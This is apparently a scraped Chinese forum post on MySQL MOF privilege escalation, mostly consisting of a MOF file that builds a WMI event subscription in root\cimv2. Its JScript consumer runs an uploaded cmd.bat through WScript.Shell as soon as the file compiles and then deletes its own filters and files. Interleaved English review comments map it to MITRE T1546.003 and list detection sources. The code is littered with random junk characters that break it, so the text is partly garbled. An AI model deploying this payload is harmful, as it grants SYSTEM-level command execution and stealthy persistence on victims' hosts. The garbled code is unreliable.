这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
这个sql提权MOF需要运行 system下的文件,不能定义路径。
需要将要运行的命令写入到bat上传到system32目录,然后执行。
// Review: this MOF builds a WMI permanent event subscription (filter + consumer +
// binding, MITRE ATT&CK T1546.003) directly in root\cimv2 instead of the usual
// root\subscription namespace, so inventory that only enumerates root\subscription
// will miss it. Once compiled, the subscription lives in the WMI repository and the
// consumer script runs in the WMI service context, independent of whoever compiled
// the file. Detection: Sysmon event IDs 19/20/21 (WmiEventFilter / WmiEventConsumer
// / WmiEventConsumerToFilter), the Microsoft-Windows-WMI-Activity/Operational log,
// and periodic enumeration of __EventFilter, ActiveScriptEventConsumer and
// __FilterToConsumerBinding instances in every namespace, e.g.
//   Get-WmiObject -Namespace root\cimv2 -Class __FilterToConsumerBinding
// The page's premise (a SQL service dropping a file under system32\wbem) only holds
// when that service runs as SYSTEM with unrestricted file writes; a low-privileged
// service account and a restricted file-export directory remove that path.
% t1 t, J! K% l' g7 x# x#pragma' R5 W% q6 \2 d) k( ]
namespace("\\\\.\\root\\cimv2")
// Marker class: creating an instance of it (last statement of this file) is the
// trigger event that $Filt matches.
8 h5 j1 x4 ]) Q' o class- w* [7 Y+ L% w0 u/ g7 |
MyClass547% n; R2 |6 O) L- C& ~
{ [key] O: E+ H$ D0 Q+ n+ A" o
string* P2 s' {5 @6 E# }
Name;
8 @9 K, A$ n& t# E };% T9 ?: ?2 O5 g! d# i( j
// Re-declares ActiveScriptEventConsumer inside root\cimv2 and, in the
// __Win32Provider / __EventConsumerProviderRegistration instances that follow,
// registers the stock script-consumer provider (CLSID below) for it. On a default
// system this class/provider pair is normally only present in root\subscription,
// so its appearance in cimv2 is itself a strong indicator.
class
( b, h- c* n4 A& n; b" y& e ActiveScriptEventConsumer1 x8 c# G, o7 m2 P- }4 J
: __EventConsumer { [key]
' ?2 S+ P) s6 s( X string
# F+ Y6 o" ?8 A6 j* f z5 p% P' _ Name; [not_null]
5 ]4 J. N( H' j7 q$ ]: h- c% w/ C8 H string* b" L: a2 A1 f. }3 k
ScriptingEngine; string
# M; D7 B& s, B1 y( j ScriptFileName; [template]+ r: T/ {3 ]! n2 e2 }$ b( [
string0 K- D6 M0 X5 r4 e/ i3 m
ScriptText; uint32 KillTimeout;! R m4 a( }6 J4 c) M
}; instance of __Win32Provider as $P {, ]- N4 l* ^$ f
Name3 y, S5 t# T u; p
=# P* i9 H! u1 V! T
"ActiveScriptEventConsumer"; CLSID =
1 X& n; T0 f& F9 R( Y1 C6 e% m "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
* S% Q+ f7 z" v! p PerUserInitialization! t5 t: x+ e/ x: t* v5 E; b2 s
= TRUE;- h3 T6 o1 t" A0 l4 J3 I8 Q
}; instance of __EventConsumerProviderRegistration { Provider
' F" C) t' K: V0 `0 k( d8 X, Q7 U' } = $P; ConsumerClassNames' Z9 R/ a7 b9 _
=1 D# F# v; {0 L8 R* `4 H, g
{"ActiveScriptEventConsumer"};# q: P( e4 i2 Y. R
};/ Z" D5 p' w" U4 j/ h4 b& ~
// $cons ("ASEC"): bound to $Filt below. Its JScript runs "cmd.bat" through
// WScript.Shell using a relative path (the page says this resolves under the system
// directory — TODO confirm against the WMI service's working directory), then
// deletes the MyClass547 class, the "instfilt" filter and the "ASEC" consumer to
// remove its own trigger. The WScript.Shell ActiveXObject created from inside the
// WMI host process is the detection hook here.
Instance of ActiveScriptEventConsumer
: M, E6 j2 F* q as $cons { Name
; r2 N/ |5 u' [2 V3 f =
* s. K4 ?5 s. {" M" E1 T+ v "ASEC"; ScriptingEngine! H/ N4 W+ [$ b3 Y; B4 V
=
( z" d, r- N" ]) W9 a' a% w "JScript"; ScriptText
- o) |( B3 f3 Z0 _) |0 T+ l A =0 i! a! F. E, Y8 a# ?, j- z$ ?) n
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
// $cons2 ("qndASEC"): bound to $Filt2 below. Cleanup stage — deletes the dropped
// MOF at wbem\mof\good\hBsBa.mof, cmd.bat, the "qndfilt" filter and itself.
// NOTE(review): the wbem\mof\good path points at the old MOF auto-compile drop
// folder, which reportedly no longer exists on current Windows releases, and a
// batch file started by WScript.Shell.Run shows up as a cmd.exe process rather
// than "cmd.bat", so the deletion trigger in $Filt2 probably never matches. Expect
// the qndfilt/qndASEC subscription, cmd.bat and the compiled MOF to remain behind
// as forensic artifacts.
8 N4 O6 d: K( k! @9 n8 ` Instance of ActiveScriptEventConsumer
/ v$ P6 U( [' p( J as $cons2 { Name
! Q" Z: C) _0 Z+ W. h& C) H/ l =
# w$ a; y+ J( g2 E4 c- ? "qndASEC"; ScriptingEngine
, u' F9 H: {# G. j" Z =
$ T% q' p- j. V# y8 @ "JScript"; ScriptText
, L Z' v0 v4 t, X L =
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";0 d% w: l2 v1 V2 O' ~ o/ _# F
// Filters. $Filt ("instfilt") matches the creation of any MyClass547 instance —
// which the end of this file performs, so the $cons script runs as soon as the MOF
// is compiled. $Filt2 ("qndfilt") polls once a second (WITHIN 1) for the deletion
// of a Win32_Process whose Name is "cmd.bat".
}; instance of __EventFilter as $Filt { Name
\; K# n+ J" F7 J9 b' D =
% V, c1 J. }+ ^- G* J- u) ?: ?5 H9 j "instfilt"; Query0 Q% ~- a& y+ t6 @* Q1 D I: F
=
: g$ g, n# t# y, r" J/ M1 m( q2 M "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage6 H; a: ^& W; D
=
% m- J; a6 T6 j& L2 E "WQL"; }; instance of __EventFilter as $Filt2 { Name6 v; j" n, T# p6 t8 v
=) n. z$ j5 a/ V
"qndfilt"; Query
5 F. }& ?7 _% [: y7 ~0 @1 J =, ~7 B6 S& c0 L" e( C" _
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage# y* j$ s7 Q% `; ?
=. q& ~- F7 A. [( R
// Bindings: $bind wires $Filt -> $cons, $bind2 wires $Filt2 -> $cons2. The
// __FilterToConsumerBinding instances are the objects to look for (and remove)
// when hunting this subscription.
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
" R3 v. Y+ U* j% c = $cons; Filter
$ B# }4 h# d7 n$ ^( i6 `) r2 K = $Filt;0 x1 I- h! b, W2 r/ \1 }
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
b# _, }; a% Z& V# E9 Q2 S4 r: [; ~ = $cons2; Filter2 v8 ?2 G' l4 Z( k+ @! R
= $Filt2;
// Creating this MyClass547 instance raises the __InstanceCreationEvent that $Filt
// matches; compiling the file is therefore the execution trigger, no further action
// is needed by whoever dropped it.
2 F2 S! G/ L% N' X4 u }; instance of MyClass547$ m# u( `/ V g' c% g/ q! Y
as $MyClass { Name; _! {' w8 n: S" o
=$ N& E& W) t! k
"ClassConsumer";
8 T( G, k4 t- k+ s }; |